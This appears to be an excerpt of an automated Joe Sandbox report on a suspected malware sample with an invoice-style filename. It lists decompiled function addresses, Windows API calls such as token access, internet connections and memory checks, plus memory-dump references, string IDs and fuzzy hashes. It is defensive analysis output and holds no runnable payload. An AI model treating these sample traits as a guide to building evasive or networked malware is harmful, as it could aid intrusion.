                                          • GetCurrentThread.KERNEL32 ref: 0045871B
                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CurrentOpenProcessThreadToken
                                          • String ID:
                                          • API String ID: 3974789173-0
                                          • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                          • Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
                                          • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                          • Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
                                          Function 00406240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %I
                                          • API String ID: 0-63094095
                                          • Opcode ID: a0a18856917c951dd355d68e039e149d8170a3ecbb95557f171f7bf658f6a256
                                          • Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
                                          • Opcode Fuzzy Hash: a0a18856917c951dd355d68e039e149d8170a3ecbb95557f171f7bf658f6a256
                                          • Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E
                                          Function 0047AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __itow_s
                                          • String ID: xbL$xbL
                                          • API String ID: 3653519197-3351732020
                                          • Opcode ID: c5469b7ac0b3c7661acd055f50eea0ef8a1bc667476caa33fb8e4b48a346c8ff
                                          • Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
                                          • Opcode Fuzzy Hash: c5469b7ac0b3c7661acd055f50eea0ef8a1bc667476caa33fb8e4b48a346c8ff
                                          • Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99
                                          Function 0046AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                          • __wcsnicmp.LIBCMT ref: 0046B02D
                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                          • String ID: LPT
                                          • API String ID: 3222508074-1350329615
                                          • Opcode ID: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                          • Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
                                          • Opcode Fuzzy Hash: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                          • Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
                                          Function 00412957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNEL32(00000000), ref: 00412968
                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: GlobalMemorySleepStatus
                                          • String ID: @
                                          • API String ID: 2783356886-2766056989
                                          • Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                          • Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
                                          • Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                          • Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
                                          Function 00469734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00404F0B: __fread_nolock.LIBCMT ref: 00404F29
                                          • _wcscmp.LIBCMT ref: 00469824
                                          • _wcscmp.LIBCMT ref: 00469837
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _wcscmp$__fread_nolock
                                          • String ID: FILE
                                          • API String ID: 4029003684-3121273764
                                          • Opcode ID: 61b9d9cc128ec34272c66af4fd2f1fdd343520f55c014a8993afaf0baf9333d9
                                          • Instruction ID: cde52b3ca8712c625de002da450250744642bb9d8a04c3b997614ed6dba67ccd
                                          • Opcode Fuzzy Hash: 61b9d9cc128ec34272c66af4fd2f1fdd343520f55c014a8993afaf0baf9333d9
                                          • Instruction Fuzzy Hash: 8C41A771A0021ABADF20AAA5CC45FEF77BDDF85714F00047EB604B7181DA79AD058B69
                                          Function 00440574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID: DdL$DdL
                                          • API String ID: 1473721057-91670653
                                          • Opcode ID: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                                          • Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
                                          • Opcode Fuzzy Hash: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                                          • Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A
                                          Function 0047258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0047259E
                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CrackInternet_memset
                                          • String ID: |
                                          • API String ID: 1413715105-2343686810
                                          • Opcode ID: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
                                          • Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
                                          • Opcode Fuzzy Hash: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
                                          • Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65
                                          Function 00486A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(?,?,?,?), ref: 00486B17
                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$DestroyMove
                                          • String ID: static
                                          • API String ID: 2139405536-2160076837
                                          • Opcode ID: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                          • Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
                                          • Opcode Fuzzy Hash: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                          • Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68
                                          Function 004628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00462911
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          • Opcode ID: 92f9e9f041086d142ac39036aa78b8e8b2e32160e262157300fe5ac97b1e7f6d
                                          • Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
                                          • Opcode Fuzzy Hash: 92f9e9f041086d142ac39036aa78b8e8b2e32160e262157300fe5ac97b1e7f6d
                                          • Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B
                                          Function 004866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: Combobox
                                          • API String ID: 3850602802-2096851135
                                          • Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                          • Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
                                          • Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                          • Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8
                                          Function 00486C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                            • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                            • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                          • GetWindowRect.USER32(00000000,?), ref: 00486C71
                                          • GetSysColor.USER32(00000012), ref: 00486C8B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                          • String ID: static
                                          • API String ID: 1983116058-2160076837
                                          • Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                          • Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
                                          • Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                          • Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64
                                          Function 00486920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: LengthMessageSendTextWindow
                                          • String ID: edit
                                          • API String ID: 2978978980-2167791130
                                          • Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                          • Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
                                          • Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                          • Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758
                                          Function 004629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00462A22
                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          • Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                          • Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
                                          • Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                          • Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A
                                          Function 004721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Internet$OpenOption
                                          • String ID: <local>
                                          • API String ID: 942729171-4266983199
                                          • Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                          • Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
                                          • Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                          • Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9
                                          Function 0041092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                          • _wcscat.LIBCMT ref: 00444CB7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
